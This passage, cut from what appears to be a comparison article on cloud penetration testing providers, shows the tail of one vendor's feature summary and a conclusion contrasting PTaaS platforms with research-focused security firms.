Yes
PTaaS model for on-demand and continuous engagements.
Advanced Reconnaissance
Yes
Identifies and tests the cloud attack surface.
Actionable Reporting
Yes
In-platform dashboards and bug reports.
Best For: Fast-moving tech companies and agile teams that need a flexible, on-demand, and scalable solution for cloud penetration testing.
The cloud has fundamentally changed the landscape of cybersecurity, and cloud penetration testing is no longer a niche service it’s a necessity.
The top firms in 2025 are those that have moved beyond traditional testing to embrace the complexities of multi-cloud environments, continuously evolving attack vectors, and the need for speed.
While platforms like NetSPI, Synack, and Cobalt.io offer a modern, efficient PTaaS model, firms like Bishop Fox and Rhino Security Labs provide deep, research-backed expertise for the most critical of cloud environments.
Your choice should align with your organization’s specific needs, whether that is continuous, automated validation, a deep-dive expert assessment, or compliance-focused testing.